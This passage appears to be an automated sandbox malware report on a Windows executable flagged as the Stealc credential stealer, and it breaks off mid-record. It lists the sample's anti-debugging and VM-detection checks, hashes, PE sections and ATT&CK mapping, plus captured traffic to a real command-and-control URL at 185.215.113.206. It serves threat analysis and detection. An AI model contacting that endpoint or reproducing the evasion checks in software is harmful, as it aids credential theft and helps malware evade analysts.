              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0062DB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0063DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_0063DD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0063D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0063D530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006216A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_006216A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006216B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_006216B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00641BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,0_2_00641BF0
              Source: file.exe, file.exe, 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000002.2196277198.00000000012F2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2196277198.00000000012C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000002.2196277198.000000000127E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: file.exe, 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25682
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25535
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25690
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25554
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00624A60 VirtualProtect 00000000,00000004,00000100,?0_2_00624A60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00646390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00646390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00646390 mov eax, dword ptr fs:[00000030h]0_2_00646390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00642A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00642A40
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 2812, type: MEMORYSTR
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00644610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,0_2_00644610
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006446A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,0_2_006446A0
              Source: file.exeBinary or memory string: oProgram Manager
              Source: file.exe, 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: oProgram Manager
              Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00642D60
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00642B60 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00642B60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00642A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00642A40
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00642C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00642C10

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2137394593.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2196277198.000000000127E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 2812, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2137394593.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2196277198.000000000127E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 2812, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Command and Scripting Interpreter
              1
              Create Account
              11
              Process Injection
              1
              Masquerading
              OS Credential Dumping2
              System Time Discovery
              Remote Services1
              Archive Collected Data
              2
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts13
              Native API
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              33
              Virtualization/Sandbox Evasion
              LSASS Memory641
              Security Software Discovery
              Remote Desktop ProtocolData from Removable Media2
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
              Disable or Modify Tools
              Security Account Manager33
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Process Injection
              NTDS13
              Process Discovery
              Distributed Component Object ModelInput Capture12
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information
              LSA Secrets1
              Account Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
              Obfuscated Files or Information
              Cached Domain Credentials1
              System Owner/User Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
              Software Packing
              DCSync1
              File and Directory Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading
              Proc Filesystem324
              System Information Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://185.215.113.206/ba100%Avira URL Cloudmalware
              http://185.215.113.206/ka100%Avira URL Cloudmalware
              http://185.215.113.206/c4becf79229cb002.php/ya100%Avira URL Cloudmalware
              http://185.215.113.206/Sa100%Avira URL Cloudmalware
              http://185.215.113.206/c4becf79229cb002.php6-535557bcc5fa00100%Avira URL Cloudmalware
              http://185.215.113.206/c4becf79229cb002.php/c4becf79229cb002.php100%Avira URL Cloudmalware
              http://185.215.113.206/tingsLMEM8100%Avira URL Cloudmalware
              No contacted domains info
              NameMaliciousAntivirus DetectionReputation
              http://185.215.113.206/c4becf79229cb002.phpfalse
                high
                http://185.215.113.206/c4becf79229cb002.php/c4becf79229cb002.phptrue
                • Avira URL Cloud: malware
                unknown
                http://185.215.113.206/false
                  high
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://185.215.113.206/c4becf79229cb002.php6-535557bcc5fa00file.exe, 00000000.00000002.2196277198.000000000127E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://185.215.113.206/kafile.exe, 00000000.00000002.2196277198.00000000012D7000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://185.215.113.206file.exe, 00000000.00000002.2196277198.000000000127E000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    http://185.215.113.206/c4becf79229cb002.phpSfile.exe, 00000000.00000002.2196277198.00000000012EC000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      http://185.215.113.206/tingsLMEM8file.exe, 00000000.00000002.2196277198.00000000012D7000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      unknown
                      http://185.215.113.206/bafile.exe, 00000000.00000002.2196277198.00000000012D7000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      unknown
                      http://185.215.113.206/Safile.exe, 00000000.00000002.2196277198.00000000012D7000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      unknown
                      http://185.215.113.206/c4becf79229cb002.php/yafile.exe, 00000000.00000002.2196277198.00000000012D7000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      unknown
                      http://185.215.113.206/c4becf79229cb002.phpgfile.exe, 00000000.00000002.2196277198.00000000012EC000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        185.215.113.206
                        unknownPortugal
                        206894WHOLESALECONNECTIONSNLtrue
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1560037
                        Start date and time:2024-11-21 10:36:12 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 3m 1s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:2
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:file.exe
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@1/0@0/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 80%
                        • Number of executed functions: 18
                        • Number of non-executed functions: 117
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Stop behavior analysis, all processes terminated
                        • Exclude process from analysis (whitelisted): dllhost.exe
                        • Excluded domains from analysis (whitelisted): otelrules.azureedge.net
                        • VT rate limit hit for: file.exe
                        No simulations
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        185.215.113.206file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                        • 185.215.113.206/68b591d6548ec281/sqlite3.dll
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        No context
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaCBrowse
                        • 185.215.113.16
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206
                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                        • 185.215.113.206
                        file.exeGet hashmaliciousLummaCBrowse
                        • 185.215.113.16
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206
                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                        • 185.215.113.206
                        file.exeGet hashmaliciousLummaCBrowse
                        • 185.215.113.16
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206
                        No context
                        No context
                        No created / dropped files found
                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):7.943084677677914
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:file.exe
                        File size:1'760'768 bytes
                        MD5:e1dcc0eabbbedc586e3f5fd45f8735d0
                        SHA1:b434195b6c7d5a4d5960840d18df55cc1fc3ff79
                        SHA256:e20885cb4967e6f72d4c70dcb97c1fd19aefff88972723b266483a09966916ca
                        SHA512:ef01d622cacef1786a620a25d13bb02280282abf83e5c814bdd22aaf33f222ca88e4af050f0b86ffb82c2b4f21d10661a51008b2de19a2b14085038d046a6254
                        SSDEEP:49152:g7Hqe25z6iBj0ylizFsHZubjhgRwacIj3qeSjikp:gmeTylHZublgRwajCjikp
                        TLSH:66853390CFCE3AD5DC9CE2BBE22F2240277DAB99F184AE5C460E24754817FFCA694511
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..
                        Icon Hash:00928e8e8686b000
                        Entrypoint:0xa76000
                        Entrypoint Section:.taggant
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                        Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:1
                        File Version Major:5
                        File Version Minor:1
                        Subsystem Version Major:5
                        Subsystem Version Minor:1
                        Import Hash:2eabe9054cad5152567f0699947a2c5b
                        Instruction
                        jmp 00007FF7B051A83Ah
                        bsf ebx, dword ptr [edx]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add cl, ch
                        add byte ptr [eax], ah
                        add byte ptr [eax], al
                        add byte ptr [esi], al
                        or al, byte ptr [eax]
                        add byte ptr [0B00000Ah], al
                        or al, byte ptr [eax]
                        add byte ptr [edx], al
                        or al, byte ptr [eax]
                        add byte ptr [ecx], al
                        or al, byte ptr [eax]
                        add byte ptr [edi], al
                        or al, byte ptr [eax]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [ecx], cl
                        add byte ptr [eax], 00000000h
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        adc byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        pop es
                        or al, byte ptr [eax]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], dl
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [ebx], cl
                        or al, byte ptr [eax]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [esi], al
                        or al, byte ptr [eax]
                        add byte ptr [0000000Ah], al
                        Programming Language:
                        • [C++] VS2010 build 30319
                        • [ASM] VS2010 build 30319
                        • [ C ] VS2010 build 30319
                        • [ C ] VS2008 SP1 build 30729
                        • [IMP] VS2008 SP1 build 30729
                        • [LNK] VS2010 build 30319
                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x24b04d0x61.idata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x24a0000x1ac.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x24b1f80x8.idata
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        0x10000x2490000x162007cb15b74c7704c70e27c7f570f19b1e6unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc0x24a0000x1ac0x2000ad0707a384aefc7a74caab660b57200False0.58203125data4.591732776412112IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .idata 0x24b0000x10000x2000d0399d83a742d5d86c5718841e8e842False0.134765625data0.8646718654202081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        0x24c0000x2950000x200ac26d0bc1ed02701fb094274de0cf8dbunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        kerxdhhv0x4e10000x1940000x193e005f9c7c928d49cfa301999b5e4f78fc63False0.9947445160167131data7.952968465504712IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        dedzcksa0x6750000x10000x600007a32d17b9231142d6fdda3fde1099eFalse0.5390625data4.882361359688378IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .taggant0x6760000x30000x22009ac1261fe22c24109bba2206dc6cf1c6False0.07134650735294118DOS executable (COM)0.7724505209662605IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        NameRVASizeTypeLanguageCountryZLIB Complexity
                        RT_MANIFEST0x674b000x152ASCII text, with CRLF line terminators0.6479289940828402
                        DLLImport
                        kernel32.dlllstrcpy
                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                        2024-11-21T10:37:16.839004+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.549706185.215.113.20680TCP
                        TimestampSource PortDest PortSource IPDest IP
                        Nov 21, 2024 10:37:14.809145927 CET4970680192.168.2.5185.215.113.206
                        Nov 21, 2024 10:37:14.928740025 CET8049706185.215.113.206192.168.2.5
                        Nov 21, 2024 10:37:14.928822994 CET4970680192.168.2.5185.215.113.206
                        Nov 21, 2024 10:37:14.929044008 CET4970680192.168.2.5185.215.113.206
                        Nov 21, 2024 10:37:15.049299002 CET8049706185.215.113.206192.168.2.5
                        Nov 21, 2024 10:37:16.362616062 CET8049706185.215.113.206192.168.2.5
                        Nov 21, 2024 10:37:16.362714052 CET4970680192.168.2.5185.215.113.206
                        Nov 21, 2024 10:37:16.374242067 CET4970680192.168.2.5185.215.113.206
                        Nov 21, 2024 10:37:16.493957043 CET8049706185.215.113.206192.168.2.5
                        Nov 21, 2024 10:37:16.838920116 CET8049706185.215.113.206192.168.2.5
                        Nov 21, 2024 10:37:16.839004040 CET4970680192.168.2.5185.215.113.206
                        Nov 21, 2024 10:37:20.760255098 CET4970680192.168.2.5185.215.113.206
                        • 185.215.113.206
                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.549706185.215.113.206802812C:\Users\user\Desktop\file.exe
                        TimestampBytes transferredDirectionData
                        Nov 21, 2024 10:37:14.929044008 CET90OUTGET / HTTP/1.1
                        Host: 185.215.113.206
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Nov 21, 2024 10:37:16.362616062 CET203INHTTP/1.1 200 OK
                        Date: Thu, 21 Nov 2024 09:37:16 GMT
                        Server: Apache/2.4.41 (Ubuntu)
                        Content-Length: 0
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                        Nov 21, 2024 10:37:16.374242067 CET412OUTPOST /c4becf79229cb002.php HTTP/1.1
